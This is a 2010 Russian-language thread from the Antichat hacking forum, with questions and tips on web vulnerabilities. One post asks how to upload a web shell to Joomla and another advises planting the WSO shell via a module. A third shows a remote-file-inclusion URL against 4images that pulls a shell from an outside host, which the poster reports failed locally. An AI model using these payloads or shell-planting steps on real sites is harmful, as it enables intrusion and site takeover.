HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.08.2010, 02:47
Platon
Познающий
Регистрация: 05.01.2009
Сообщений: 32
С нами: 9130560

Репутация: 12
По умолчанию

mr.celt - спасибо! мега удобная тузла! раньше делал это в ручную, теперь проверка наличие плагинов - дело 2 минут, очень мне понравилась!

[Feldmarschall] - ок, ухожу в другой топик.
 
Ответить с цитированием

  #2  
Старый 15.08.2010, 18:53
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
С нами: 8467184

Репутация: 1
По умолчанию

Приветствую, уважаемые форумчане.

Извините за идиотский вопрос, но как залить шелл в joomla v.1.5, если нет ни JoomlaXplorer, ни меню редактирования языков, при заливке в папку с картинками (media), пишет, что не правильное изображение (пробовал и 123.php и 123.php.jpg и 123.png), плюс к этому глобальный админ отключен, у меня аккаунт админа...

Кстати пишет, что запись в папку с картинками разрешена, но какой-то зловредный скрипт этому мешает.

Помогите, оч надо, а то решил шелами заняться (для общего развития), а тут такая засада...
 
Ответить с цитированием

  #3  
Старый 17.08.2010, 01:51
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Если папка modules вритабельна, ставим новый модуль.

Архив по ссылке.

Шелл : wso.

zalil.ru/upload/29460413

Вот чёрт, файл удалён. Завтра перезалью.

Посмотри права в templates. Не одним JoomlaXplorer'ом залитие обходится, смотри ещё модули.
 
Ответить с цитированием

  #4  
Старый 30.08.2010, 21:31
x.Mr.Bob.x
Новичок
Регистрация: 11.05.2010
Сообщений: 0
С нами: 8423147

Репутация: 0
По умолчанию

А вот допустим сейчас вышла новая версия vBulletin 4.0 Publishing Suite что входит в неё?если я приобрету смогу ли я пользоватся первое время стабильной 3.8.6 а после перейти без проблем на 4?
 
Ответить с цитированием

  #5  
Старый 03.09.2010, 15:24
putty
Новичок
Регистрация: 03.09.2010
Сообщений: 0
С нами: 8258006

Репутация: 0
По умолчанию

Есть сайты на osCommerce (версия 2003г), пытался вставить в индекс и футер что-либо, никакой реакции, на странице это не отражается почему-то. Очищение файла или нарушение целостности кода сразу отражается на странице. Почему так может быть?
 
Ответить с цитированием

  #6  
Старый 10.09.2010, 15:11
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами: 9610572

Репутация: 32
По умолчанию

4images

Сегодня покопался на inj3ct0r.com и меня заинтересовал этот пост link

Решил потестить на локальной машине. Скачал CMSку (1.7.8) с официального сайта, развернул и настроил как в мане написано.

Попробовал заюзать описанную уязвимость так

http://4images.local/global.php?db_servertype=http://shell.local/wso.txt%00

4images.local и shell.local - локальные домены.

Кроме надписи "Security violation" ничего не увидел.

Кто-нибудь тестил у себя? После просмотра исходника сложилось впечатление, что глобальный инъект невозможен, но может че-то сам не доганяю.
 
Ответить с цитированием

  #7  
Старый 13.09.2010, 00:53
x.Mr.Bob.x
Новичок
Регистрация: 11.05.2010
Сообщений: 0
С нами: 8423147

Репутация: 0
По умолчанию

Всем привет. На одном сайте захотел приобрести шаблон, но у меня появился вопрос снизу перед выбором шаблона написано Type: CSS Full Site Flash 8 или CSS Static Full Site или ещё что либо,что это означает,я знаю что Type это вид, но вот что после не знаю, если ли Flash шаблон, для установки как система управления,например приобрел,установил и через него управлять? Дальше, аот шаблон,когда я смотрю все на Английском, смогу ли я изменить без проблем это на другие слова? Заранее спасибо
 
Ответить с цитированием

  #8  
Старый 13.09.2010, 09:10
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами: 9610572

Репутация: 32
По умолчанию

Цитата:
Сообщение от x.Mr.Bob.x  
Всем привет. На одном сайте захотел приобрести шаблон, но у меня появился вопрос снизу перед выбором шаблона написано Type: CSS Full Site Flash 8 или CSS Static Full Site или ещё что либо,что это означает,я знаю что Type это вид, но вот что после не знаю, если ли Flash шаблон, для установки как система управления,например приобрел,установил и через него управлять? Дальше, аот шаблон,когда я смотрю все на Английском, смогу ли я изменить без проблем это на другие слова? Заранее спасибо
Вообще вопрос не совсем по тематике...

Но рискну предположить, что где Flash-шаблон там настройки отображения зашиты в самом flash-файле или в xml-ки, а где CSS Static, то настройки не изменяемы либо в стандартном файле с расширением css. По-поводу языка - если ты покупаешь шаблон, то делай с ним что хошешь - разбирайся в исходниках.
 
Ответить с цитированием

  #9  
Старый 13.09.2010, 18:56
x.Mr.Bob.x
Новичок
Регистрация: 11.05.2010
Сообщений: 0
С нами: 8423147

Репутация: 0
По умолчанию

а разбиратся тяжело?
 
Ответить с цитированием

  #10  
Старый 13.09.2010, 19:54
HIMIKAT
Участник форума
Регистрация: 12.01.2007
Сообщений: 117
С нами: 10172152

Репутация: 28
По умолчанию

Цитата:
Сообщение от x.Mr.Bob.x  
а разбиратся тяжело?
Поставь пока бесплатный шаб, покрути там что по чем, если совсем в тягость будет. Обезопасишь себя от необдуманной траты средств.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.